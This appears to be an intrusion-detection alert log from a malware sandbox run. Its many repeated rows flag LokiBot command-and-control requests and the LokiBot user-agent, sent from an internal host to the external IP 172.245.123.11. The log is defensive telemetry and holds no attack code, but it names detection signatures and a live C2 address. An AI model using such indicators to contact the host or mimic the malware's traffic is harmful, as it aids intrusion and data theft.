2025-01-07T11:03:29.874483+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50109	172.245.123.11	80	TCP
2025-01-07T11:03:30.549629+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50110	172.245.123.11	80	TCP
2025-01-07T11:03:31.244877+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50111	172.245.123.11	80	TCP
2025-01-07T11:03:31.926789+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50112	172.245.123.11	80	TCP
2025-01-07T11:03:32.585891+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50113	172.245.123.11	80	TCP
2025-01-07T11:03:33.260609+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50114	172.245.123.11	80	TCP
2025-01-07T11:03:34.641167+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50115	172.245.123.11	80	TCP
2025-01-07T11:03:35.284896+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50116	172.245.123.11	80	TCP
2025-01-07T11:03:35.968310+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50117	172.245.123.11	80	TCP
2025-01-07T11:03:36.632563+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50118	172.245.123.11	80	TCP
2025-01-07T11:03:37.297198+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50119	172.245.123.11	80	TCP
2025-01-07T11:03:37.932170+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50120	172.245.123.11	80	TCP
2025-01-07T11:03:38.582549+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50121	172.245.123.11	80	TCP
2025-01-07T11:03:39.249186+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50122	172.245.123.11	80	TCP
2025-01-07T11:03:39.917989+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50123	172.245.123.11	80	TCP
2025-01-07T11:03:40.576758+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50124	172.245.123.11	80	TCP
2025-01-07T11:03:41.226763+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50125	172.245.123.11	80	TCP
2025-01-07T11:03:41.941183+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50126	172.245.123.11	80	TCP
2025-01-07T11:03:42.582157+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50127	172.245.123.11	80	TCP
2025-01-07T11:03:43.230772+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50128	172.245.123.11	80	TCP
2025-01-07T11:03:43.883877+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50129	172.245.123.11	80	TCP
2025-01-07T11:03:44.565510+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50130	172.245.123.11	80	TCP
2025-01-07T11:03:45.213830+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50131	172.245.123.11	80	TCP
2025-01-07T11:03:45.873777+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50132	172.245.123.11	80	TCP
2025-01-07T11:03:46.508415+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50133	172.245.123.11	80	TCP
2025-01-07T11:03:47.253639+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50134	172.245.123.11	80	TCP
2025-01-07T11:03:47.940009+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50135	172.245.123.11	80	TCP
2025-01-07T11:03:48.599995+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50136	172.245.123.11	80	TCP
2025-01-07T11:03:49.272186+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50137	172.245.123.11	80	TCP
2025-01-07T11:03:49.952988+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50138	172.245.123.11	80	TCP
2025-01-07T11:03:50.591200+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50139	172.245.123.11	80	TCP
2025-01-07T11:03:51.248033+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50140	172.245.123.11	80	TCP
2025-01-07T11:03:51.922208+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50141	172.245.123.11	80	TCP
2025-01-07T11:03:52.591519+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50142	172.245.123.11	80	TCP
2025-01-07T11:03:53.254331+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50143	172.245.123.11	80	TCP
2025-01-07T11:03:53.917456+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50144	172.245.123.11	80	TCP
2025-01-07T11:03:54.583211+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50145	172.245.123.11	80	TCP
2025-01-07T11:03:55.236735+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50146	172.245.123.11	80	TCP
2025-01-07T11:03:55.875902+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50147	172.245.123.11	80	TCP
2025-01-07T11:03:56.528237+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50148	172.245.123.11	80	TCP
2025-01-07T11:03:57.196556+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50149	172.245.123.11	80	TCP
2025-01-07T11:03:57.860803+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50150	172.245.123.11	80	TCP
2025-01-07T11:03:58.560538+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50151	172.245.123.11	80	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T11:01:58.458090+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49706	172.245.123.11	80	TCP
2025-01-07T11:01:59.167458+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49708	172.245.123.11	80	TCP
2025-01-07T11:01:59.826437+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49709	172.245.123.11	80	TCP
2025-01-07T11:02:00.489975+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49710	172.245.123.11	80	TCP
2025-01-07T11:02:01.182301+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49711	172.245.123.11	80	TCP
2025-01-07T11:02:01.907867+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49712	172.245.123.11	80	TCP
2025-01-07T11:02:02.634049+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49714	172.245.123.11	80	TCP
2025-01-07T11:02:03.321041+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49715	172.245.123.11	80	TCP
2025-01-07T11:02:04.082310+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49716	172.245.123.11	80	TCP
2025-01-07T11:02:04.772127+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49717	172.245.123.11	80	TCP
2025-01-07T11:02:05.483094+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49718	172.245.123.11	80	TCP
2025-01-07T11:02:06.191450+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49719	172.245.123.11	80	TCP
2025-01-07T11:02:06.944182+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49720	172.245.123.11	80	TCP
2025-01-07T11:02:07.693898+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49721	172.245.123.11	80	TCP
2025-01-07T11:02:08.371774+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49722	172.245.123.11	80	TCP
2025-01-07T11:02:09.043689+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49723	172.245.123.11	80	TCP
2025-01-07T11:02:09.690323+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49724	172.245.123.11	80	TCP
2025-01-07T11:02:10.371491+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49725	172.245.123.11	80	TCP
2025-01-07T11:02:11.080195+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49727	172.245.123.11	80	TCP
2025-01-07T11:02:11.739564+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49730	172.245.123.11	80	TCP
2025-01-07T11:02:12.466482+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49732	172.245.123.11	80	TCP
2025-01-07T11:02:13.113940+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49734	172.245.123.11	80	TCP
2025-01-07T11:02:13.753938+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49736	172.245.123.11	80	TCP
2025-01-07T11:02:14.420666+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49738	172.245.123.11	80	TCP
2025-01-07T11:02:15.079219+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49739	172.245.123.11	80	TCP
2025-01-07T11:02:15.751764+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49740	172.245.123.11	80	TCP
2025-01-07T11:02:16.407319+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49741	172.245.123.11	80	TCP
2025-01-07T11:02:17.070038+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49742	172.245.123.11	80	TCP
2025-01-07T11:02:17.794738+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49748	172.245.123.11	80	TCP
2025-01-07T11:02:18.478664+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49754	172.245.123.11	80	TCP
2025-01-07T11:02:19.157102+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49760	172.245.123.11	80	TCP
2025-01-07T11:02:19.851955+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49766	172.245.123.11	80	TCP
2025-01-07T11:02:20.564861+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49772	172.245.123.11	80	TCP
2025-01-07T11:02:21.267286+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49778	172.245.123.11	80	TCP
2025-01-07T11:02:21.949590+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49784	172.245.123.11	80	TCP
2025-01-07T11:02:22.615903+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49790	172.245.123.11	80	TCP
2025-01-07T11:02:23.331353+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49795	172.245.123.11	80	TCP
2025-01-07T11:02:24.058134+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49801	172.245.123.11	80	TCP
2025-01-07T11:02:24.758689+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49804	172.245.123.11	80	TCP
2025-01-07T11:02:25.495647+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49810	172.245.123.11	80	TCP
2025-01-07T11:02:26.182014+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49815	172.245.123.11	80	TCP
2025-01-07T11:02:26.935612+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49821	172.245.123.11	80	TCP
2025-01-07T11:02:27.636276+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49828	172.245.123.11	80	TCP
2025-01-07T11:02:28.470234+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49834	172.245.123.11	80	TCP
2025-01-07T11:02:29.132407+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49839	172.245.123.11	80	TCP
2025-01-07T11:02:29.819500+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49843	172.245.123.11	80	TCP
2025-01-07T11:02:30.594718+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49849	172.245.123.11	80	TCP
2025-01-07T11:02:31.270511+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49854	172.245.123.11	80	TCP
2025-01-07T11:02:31.967447+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49860	172.245.123.11	80	TCP
2025-01-07T11:02:32.650824+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49865	172.245.123.11	80	TCP
2025-01-07T11:02:33.618441+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49872	172.245.123.11	80	TCP
2025-01-07T11:02:34.281865+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49877	172.245.123.11	80	TCP
2025-01-07T11:02:35.003595+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49883	172.245.123.11	80	TCP
2025-01-07T11:02:35.669509+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49889	172.245.123.11	80	TCP
2025-01-07T11:02:36.331257+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49895	172.245.123.11	80	TCP
2025-01-07T11:02:36.981306+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49901	172.245.123.11	80	TCP
2025-01-07T11:02:37.629932+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49907	172.245.123.11	80	TCP
2025-01-07T11:02:38.440568+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49912	172.245.123.11	80	TCP
2025-01-07T11:02:39.104350+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49915	172.245.123.11	80	TCP
2025-01-07T11:02:39.771926+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49920	172.245.123.11	80	TCP
2025-01-07T11:02:40.445565+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49926	172.245.123.11	80	TCP
2025-01-07T11:02:41.134057+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49932	172.245.123.11	80	TCP
2025-01-07T11:02:41.803713+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49934	172.245.123.11	80	TCP
2025-01-07T11:02:42.460094+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49940	172.245.123.11	80	TCP
2025-01-07T11:02:43.145887+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49946	172.245.123.11	80	TCP
2025-01-07T11:02:43.852429+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49952	172.245.123.11	80	TCP
2025-01-07T11:02:44.522317+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49958	172.245.123.11	80	TCP
2025-01-07T11:02:45.350075+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49964	172.245.123.11	80	TCP
2025-01-07T11:02:46.030026+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49969	172.245.123.11	80	TCP
2025-01-07T11:02:46.699521+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49971	172.245.123.11	80	TCP
2025-01-07T11:02:47.374652+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49976	172.245.123.11	80	TCP
2025-01-07T11:02:48.292985+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49982	172.245.123.11	80	TCP
2025-01-07T11:02:49.000377+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49987	172.245.123.11	80	TCP
2025-01-07T11:02:49.647470+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49994	172.245.123.11	80	TCP
2025-01-07T11:02:50.327734+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50000	172.245.123.11	80	TCP
2025-01-07T11:02:51.066587+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50006	172.245.123.11	80	TCP
2025-01-07T11:02:51.758580+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50009	172.245.123.11	80	TCP
2025-01-07T11:02:52.460403+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50015	172.245.123.11	80	TCP
2025-01-07T11:02:53.129836+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50020	172.245.123.11	80	TCP
2025-01-07T11:02:53.777572+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50026	172.245.123.11	80	TCP
2025-01-07T11:02:54.694689+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50032	172.245.123.11	80	TCP
2025-01-07T11:02:55.670454+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50038	172.245.123.11	80	TCP
2025-01-07T11:02:56.381416+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50044	172.245.123.11	80	TCP
2025-01-07T11:02:57.059679+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50050	172.245.123.11	80	TCP
2025-01-07T11:02:57.747009+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50055	172.245.123.11	80	TCP
2025-01-07T11:02:58.413612+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50061	172.245.123.11	80	TCP
2025-01-07T11:02:59.073831+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50066	172.245.123.11	80	TCP
2025-01-07T11:02:59.743774+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50067	172.245.123.11	80	TCP
2025-01-07T11:03:00.408178+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50068	172.245.123.11	80	TCP
2025-01-07T11:03:01.053021+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50069	172.245.123.11	80	TCP
2025-01-07T11:03:01.734889+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50070	172.245.123.11	80	TCP
2025-01-07T11:03:02.402684+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50071	172.245.123.11	80	TCP
2025-01-07T11:03:03.187911+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50072	172.245.123.11	80	TCP
2025-01-07T11:03:03.861850+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50073	172.245.123.11	80	TCP
2025-01-07T11:03:04.533061+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50074	172.245.123.11	80	TCP
2025-01-07T11:03:05.175668+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50075	172.245.123.11	80	TCP
2025-01-07T11:03:05.822128+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50076	172.245.123.11	80	TCP
2025-01-07T11:03:06.488704+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50077	172.245.123.11	80	TCP
2025-01-07T11:03:07.161033+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50078	172.245.123.11	80	TCP
2025-01-07T11:03:07.986400+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50079	172.245.123.11	80	TCP
2025-01-07T11:03:08.655207+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50080	172.245.123.11	80	TCP
2025-01-07T11:03:09.305924+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50081	172.245.123.11	80	TCP
2025-01-07T11:03:09.979695+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50082	172.245.123.11	80	TCP
2025-01-07T11:03:10.638606+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50083	172.245.123.11	80	TCP
2025-01-07T11:03:11.312133+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50084	172.245.123.11	80	TCP
2025-01-07T11:03:11.962130+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50085	172.245.123.11	80	TCP
2025-01-07T11:03:12.613769+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50086	172.245.123.11	80	TCP
2025-01-07T11:03:13.254814+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50087	172.245.123.11	80	TCP
2025-01-07T11:03:13.969827+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50088	172.245.123.11	80	TCP
2025-01-07T11:03:14.623238+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50089	172.245.123.11	80	TCP
2025-01-07T11:03:15.287763+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50090	172.245.123.11	80	TCP
2025-01-07T11:03:16.006105+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50091	172.245.123.11	80	TCP
2025-01-07T11:03:16.665049+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50092	172.245.123.11	80	TCP
2025-01-07T11:03:17.417958+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50093	172.245.123.11	80	TCP
2025-01-07T11:03:18.071243+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50094	172.245.123.11	80	TCP
2025-01-07T11:03:18.730694+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50095	172.245.123.11	80	TCP
2025-01-07T11:03:19.380183+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50096	172.245.123.11	80	TCP
2025-01-07T11:03:20.048570+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50097	172.245.123.11	80	TCP
2025-01-07T11:03:20.702835+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50098	172.245.123.11	80	TCP
2025-01-07T11:03:21.357331+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50099	172.245.123.11	80	TCP
2025-01-07T11:03:21.997605+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50100	172.245.123.11	80	TCP
2025-01-07T11:03:23.056888+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50101	172.245.123.11	80	TCP
2025-01-07T11:03:24.002235+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50102	172.245.123.11	80	TCP
2025-01-07T11:03:24.672832+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50103	172.245.123.11	80	TCP
2025-01-07T11:03:26.568049+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50104	172.245.123.11	80	TCP
2025-01-07T11:03:27.233167+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50105	172.245.123.11	80	TCP
2025-01-07T11:03:27.880660+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50106	172.245.123.11	80	TCP
2025-01-07T11:03:28.538323+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50107	172.245.123.11	80	TCP
2025-01-07T11:03:29.206821+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50108	172.245.123.11	80	TCP
2025-01-07T11:03:29.874483+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50109	172.245.123.11	80	TCP
2025-01-07T11:03:30.549629+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50110	172.245.123.11	80	TCP
2025-01-07T11:03:31.244877+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50111	172.245.123.11	80	TCP
2025-01-07T11:03:31.926789+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50112	172.245.123.11	80	TCP
2025-01-07T11:03:32.585891+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50113	172.245.123.11	80	TCP
2025-01-07T11:03:33.260609+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50114	172.245.123.11	80	TCP
2025-01-07T11:03:34.641167+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50115	172.245.123.11	80	TCP
2025-01-07T11:03:35.284896+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50116	172.245.123.11	80	TCP
2025-01-07T11:03:35.968310+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50117	172.245.123.11	80	TCP
2025-01-07T11:03:36.632563+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50118	172.245.123.11	80	TCP
2025-01-07T11:03:37.297198+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50119	172.245.123.11	80	TCP
2025-01-07T11:03:37.932170+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50120	172.245.123.11	80	TCP
2025-01-07T11:03:38.582549+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50121	172.245.123.11	80	TCP
2025-01-07T11:03:39.249186+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50122	172.245.123.11	80	TCP
2025-01-07T11:03:39.917989+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50123	172.245.123.11	80	TCP
2025-01-07T11:03:40.576758+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50124	172.245.123.11	80	TCP
2025-01-07T11:03:41.226763+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50125	172.245.123.11	80	TCP
2025-01-07T11:03:41.941183+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50126	172.245.123.11	80	TCP
2025-01-07T11:03:42.582157+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50127	172.245.123.11	80	TCP
2025-01-07T11:03:43.230772+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50128	172.245.123.11	80	TCP
2025-01-07T11:03:43.883877+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50129	172.245.123.11	80	TCP
2025-01-07T11:03:44.565510+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50130	172.245.123.11	80	TCP
2025-01-07T11:03:45.213830+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50131	172.245.123.11	80	TCP
2025-01-07T11:03:45.873777+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50132	172.245.123.11	80	TCP
2025-01-07T11:03:46.508415+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50133	172.245.123.11	80	TCP
2025-01-07T11:03:47.253639+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50134	172.245.123.11	80	TCP
2025-01-07T11:03:47.940009+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50135	172.245.123.11	80	TCP
2025-01-07T11:03:48.599995+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50136	172.245.123.11	80	TCP
2025-01-07T11:03:49.272186+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50137	172.245.123.11	80	TCP
2025-01-07T11:03:49.952988+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50138	172.245.123.11	80	TCP
2025-01-07T11:03:50.591200+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50139	172.245.123.11	80	TCP
2025-01-07T11:03:51.248033+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50140	172.245.123.11	80	TCP
2025-01-07T11:03:51.922208+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50141	172.245.123.11	80	TCP
2025-01-07T11:03:52.591519+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50142	172.245.123.11	80	TCP
2025-01-07T11:03:53.254331+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50143	172.245.123.11	80	TCP
2025-01-07T11:03:53.917456+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50144	172.245.123.11	80	TCP
2025-01-07T11:03:54.583211+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50145	172.245.123.11	80	TCP
2025-01-07T11:03:55.236735+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50146	172.245.123.11	80	TCP
2025-01-07T11:03:55.875902+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50147	172.245.123.11	80	TCP
2025-01-07T11:03:56.528237+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50148	172.245.123.11	80	TCP
2025-01-07T11:03:57.196556+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50149	172.245.123.11	80	TCP
2025-01-07T11:03:57.860803+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50150	172.245.123.11	80	TCP
2025-01-07T11:03:58.560538+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50151	172.245.123.11	80	TCP

ET MALWARE LokiBot User-Agent (Charon/Inferno)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T11:01:56.715463+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49704	172.245.123.11	80	TCP
2025-01-07T11:01:57.382609+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49705	172.245.123.11	80	TCP
2025-01-07T11:01:57.943923+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49706	172.245.123.11	80	TCP
2025-01-07T11:01:58.646333+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49708	172.245.123.11	80	TCP
2025-01-07T11:01:59.326148+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49709	172.245.123.11	80	TCP
2025-01-07T11:01:59.975652+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49710	172.245.123.11	80	TCP
2025-01-07T11:02:00.675299+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49711	172.245.123.11	80	TCP
2025-01-07T11:02:01.372775+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49712	172.245.123.11	80	TCP
2025-01-07T11:02:02.102743+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49714	172.245.123.11	80	TCP
2025-01-07T11:02:02.801547+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49715	172.245.123.11	80	TCP
2025-01-07T11:02:03.617744+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49716	172.245.123.11	80	TCP
2025-01-07T11:02:04.247901+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49717	172.245.123.11	80	TCP
2025-01-07T11:02:04.955089+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49718	172.245.123.11	80	TCP
2025-01-07T11:02:05.693265+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49719	172.245.123.11	80	TCP
